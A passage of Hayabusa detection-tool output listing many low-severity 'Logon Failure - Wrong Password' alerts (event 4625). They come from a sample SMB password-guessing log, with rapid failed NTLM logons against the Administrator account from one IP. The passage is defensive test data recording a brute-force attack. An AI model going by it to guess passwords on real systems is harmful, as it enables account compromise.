NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: 